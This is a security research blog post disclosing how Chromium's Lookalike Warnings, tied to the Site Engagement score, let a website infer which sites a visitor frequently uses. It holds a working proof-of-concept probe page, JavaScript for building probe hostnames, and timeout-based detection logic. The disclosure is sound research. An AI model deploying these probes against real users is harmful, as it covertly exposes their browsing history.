October 19, 2023

Demo: Chrome Site Engagement Feature Can Leak Frequently Visited Sites

Understanding the Potential Privacy Implications of Lookalike Warnings in Chromium

In this article, we will explore two lesser-known features in Chromium: Lookalike Warnings and Site Engagement. We will explain how these features can leak frequently visited or engaged sites to untrustworthy websites.

Site Engagement

For every profile, Chrome keeps a record of the websites the user frequently visits and interacts with. As the Chromium documentation says,

The Site Engagement Service provides information about how engaged a user is with a site. The primary signal is the amount of active time the user spends on the site but various other signals may be incorporated.

The documentation further notes that the engagement score increases with user activity such as scrolling, clicking, keypresses, and media playback, and when a website is added to the home screen.

It's also important to note that site engagement is copied from the original session into incognito sessions. However, no information flows from the incognito session to the original session.

You can inspect the current site engagement by navigating to chrome://site-engagement.

As far as we can tell, site engagement cannot be disabled, and it is also present in other Chromium-based browsers like Edge, Brave, or Vivaldi.

Lookalike Warnings

Chrome 75 introduced an on-by-default safety feature to protect users from social engineering attacks by malicious websites that impersonate other websites.

This feature, called "Lookalike Warnings", uses various heuristics to detect such websites. As a result, Chrome might show one of two types of warnings: a full-page display for high-confidence warnings or a popup for low-confidence warnings.

Examples of lookalike warnings

Whether a high-confidence or low-confidence warning is displayed to the user depends on the analyzed heuristics and how similar the visited website is to other popular or frequently visited websites.

To understand Chrome's internal decision-making, we have to look at the LookalikeUrlService implementation, specifically the LookalikeUrlService::CheckUrlForLookalikes function and the utility functions implemented in components/lookalikes/core/lookalike_url_util.cc.

From the source, we can conclude that Chrome searches for well-known patterns to determine whether a website the user navigated to resembles a popular domain or a website with a high engagement score. The list of popular domains is embedded into Chromium and separated into a "top bucket" containing the top 489 websites and other popular domains, totaling 4990 domains (at the time of writing).

As per the documentation, the different patterns that Chrome looks for include:

  • Domains that are a small edit distance away from other domains, such as goog0le.com.
  • Domains that embed other domain names within their hostname, such as google.com.example.com.
  • Domains that use IDN homographs, such as goögle.com.

However, inspecting the source code reveals other methods, for example:

  • Domains that combine brand names with popular keywords like "account" or "login" such as google-login.com. Brand names are generated from websites with high engagement scores, in addition to a short hardcoded list.
  • Domains with a single character swap, such as googel.com.
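To make some of these patterns concrete, here is a minimal JavaScript sketch of three of them: edit distance, character swap, and embedded domain names. It is a simplified illustration, not Chromium's implementation. The function names and the edit-distance threshold of 1 are assumptions made for the example, and IDN homographs and keyword combinations are left out.

```javascript
// Illustrative only: simplified versions of three lookalike heuristics.
// Names and thresholds are assumptions, not taken from Chromium.

// Levenshtein edit distance, computed with a single rolling row.
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0]; // value of the previous row at column j - 1
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// True if b equals a with exactly one pair of adjacent characters swapped.
function isSingleSwap(a, b) {
  if (a.length !== b.length || a === b) return false;
  let i = 0;
  while (a[i] === b[i]) i++; // first differing position; exists because a !== b
  return (
    a[i] === b[i + 1] &&
    a[i + 1] === b[i] &&
    a.slice(i + 2) === b.slice(i + 2)
  );
}

// True if `target` appears as whole labels inside `host`, followed by more
// labels, as in google.com.example.com.
function embedsDomain(host, target) {
  return host.startsWith(target + ".") || host.includes("." + target + ".");
}

// Returns the names of the heuristics that `host` matches against `target`.
function matchedHeuristics(host, target) {
  const hits = [];
  if (embedsDomain(host, target)) hits.push("target embedding");
  if (isSingleSwap(host, target)) hits.push("character swap");
  else if (host !== target && editDistance(host, target) === 1) hits.push("edit distance");
  return hits;
}

console.log(matchedHeuristics("goog0le.com", "google.com"));
console.log(matchedHeuristics("googel.com", "google.com"));
console.log(matchedHeuristics("google.com.example.com", "google.com"));
```

Note that a character swap is checked separately because swapping two adjacent characters counts as two edits under plain Levenshtein distance.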

Abusing Lookalike Warnings to Leak Site Engagement

An important detail is that Lookalike Warnings behave differently for different users to minimize false positive warnings.

Chrome only shows warnings on sites that the user has not used frequently. Further, Chrome will only recommend sites that are either well-known (i.e. top) sites, or the user has an established relationship.

Sites that show a warning to you may not show for another user, unless that user has visited the same sites that you have.

This means that a specifically crafted website name can be used to determine whether a user is engaged with a chosen site.

For example, navigating to app.slack.com.detection.site will display a high-confidence warning only to users engaged with app.slack.com.
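The hostname in this example is simply the target domain prepended to a domain under the tester's control. A minimal sketch of that construction follows; the helper name `embeddedProbeUrl` is hypothetical, and it assumes the detection domain serves the probe page for arbitrary subdomains.

```javascript
// Hypothetical helper: builds the URL of a target-embedding probe.
// `detectionDomain` is a domain controlled by the tester (detection.site in
// the example above). The "x" fragment is an assumption that matches the id
// of a focusable element on the probe page.
function embeddedProbeUrl(target, detectionDomain) {
  const url = new URL(`https://${target}.${detectionDomain}`);
  url.hash = "x";
  return url.href;
}

console.log(embeddedProbeUrl("app.slack.com", "detection.site"));
// prints "https://app.slack.com.detection.site/#x"
```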

Any website can initiate navigation by opening a new browser window with the detection website. This action requires user interaction, such as clicking a button; otherwise, the browser will block the popup window. However, a single popup window can be reused to test multiple websites, as the opener can repeatedly redirect the popup window to different locations.

The detection website can then use postMessage to notify its opener that neither a high-confidence nor a low-confidence warning was shown:

<!-- https://example.com.detection.site#x -->

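<!DOCTYPE html>
<html>
	<head>
		<script>
		// Tell the opener that this page loaded and its input received focus,
		// which means no lookalike warning got in the way.
		function notifyParent() {
			window.opener.postMessage(null, "*");
		}
		</script>
	</head>
	<body>
		<!-- The #x fragment in the URL targets this input so that it receives focus on load. -->
		<input id="x" onfocus="notifyParent()">
	</body>
</html>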

If a low-confidence popup warning is triggered, the notifyParent() function will not be called because the lookalike warning prevents the onfocus event from running. Similarly, the function will not be called in the case of a high-confidence warning because it prevents the page from loading.
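The opener has to treat the absence of a message as the signal, which in practice means waiting with a timeout. Below is a minimal sketch of that logic, not the code of the demo page. The names `waitForSignal` and `probeAll`, the injected `navigate` and `subscribe` functions, and the 3-second default timeout are all assumptions made for illustration.

```javascript
// Resolves to true if a message from `expectedOrigin` arrives within
// `timeoutMs`, and to false otherwise. `subscribe(cb)` registers a callback
// that receives the origin of each incoming message and returns a function
// that unregisters it.
function waitForSignal(subscribe, expectedOrigin, timeoutMs) {
  return new Promise((resolve) => {
    let unsubscribe = () => {};
    const finish = (received) => {
      clearTimeout(timer);
      unsubscribe();
      resolve(received);
    };
    const timer = setTimeout(() => finish(false), timeoutMs);
    unsubscribe = subscribe((origin) => {
      if (origin === expectedOrigin) finish(true);
    });
  });
}

// Visits each probe URL in turn, reusing one popup through `navigate`.
// A missing message is recorded as `warningLikely: true`.
async function probeAll(urls, navigate, subscribe, timeoutMs = 3000) {
  const results = [];
  for (const url of urls) {
    const signal = waitForSignal(subscribe, new URL(url).origin, timeoutMs);
    navigate(url);
    const loaded = await signal;
    results.push({ url, warningLikely: !loaded });
  }
  return results;
}

// Possible browser wiring (assumed; must start inside a click handler so that
// the popup is not blocked):
//   const popup = window.open("about:blank");
//   const navigate = (url) => { popup.location = url; };
//   const subscribe = (cb) => {
//     const handler = (event) => cb(event.origin);
//     window.addEventListener("message", handler);
//     return () => window.removeEventListener("message", handler);
//   };
//   probeAll(probeUrls, navigate, subscribe).then(console.log);
```

Checking the message origin keeps a late message from an earlier probe from being attributed to the current one. The timeout is a trade-off: too short and slow page loads are mistaken for warnings, too long and testing many sites takes noticeably longer.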

As described above, warnings are triggered for engaged sites and, regardless of site engagement, for top-bucket domains. For a top-bucket domain, a warning therefore does not reliably indicate engagement. However, some of the detection methods only consider engaged websites and ignore the top bucket. One example is brand names combined with popular keywords: apple-login.com will trigger a low-confidence warning only if apple.com is engaged, even though apple.com is a top-bucket domain.
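Keyword-based probe names of this kind can be derived mechanically from the target domain. The sketch below is a simplification: the helper names are hypothetical, the brand extraction assumes a single-label TLD (real code would need the Public Suffix List), and the default keyword list contains only the two keywords mentioned earlier in this article. Unlike subdomains of a single detection domain, each generated name would have to be registered separately by whoever runs the test.

```javascript
// Hypothetical helper: naive brand extraction, apple.com -> "apple".
// Assumes a single-label TLD such as .com.
function brandOf(domain) {
  const labels = domain.split(".");
  if (labels.length < 2) throw new Error(`not a registrable domain: ${domain}`);
  return labels[labels.length - 2];
}

// Builds brand-plus-keyword hostnames such as apple-login.com.
function keywordProbeHosts(domain, keywords = ["login", "account"]) {
  const brand = brandOf(domain);
  return keywords.map((keyword) => `${brand}-${keyword}.com`);
}

console.log(keywordProbeHosts("apple.com"));
// prints [ 'apple-login.com', 'apple-account.com' ]
```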

This technique is prone to false positives: a network error, or anything else that prevents the detection site from loading, looks the same to the opener as a warning. However, in most cases it is reasonable to assume that a missing message was caused by a Lookalike Warning and, therefore, by Site Engagement.

You can see this technique in practice on our demo page. Note that it's only a proof of concept with several limitations, and in its current state, it's only able to detect site engagement for domains outside of the top bucket.

Conclusion

Lookalike Warnings are arguably a great safety feature that protects users from common threats on the web. It's hard to balance effectiveness and good user experience, making Site Engagement a vital source of information. However, since disabling Site Engagement or Lookalike Warnings is impossible, we believe it's important to discuss these features' privacy implications. For some people, the risk of exposing their browsing history to a targeted attack might be far worse than being tricked by lookalike phishing websites, especially given that site engagement is also copied into incognito sessions. We hope that by raising awareness about these technologies, individuals can better protect themselves with alternative means such as using guest profiles in Chrome. If you are interested in learning more about Fingerprint and the solutions we provide to businesses to prevent fraud, we encourage you to connect with our sales team.
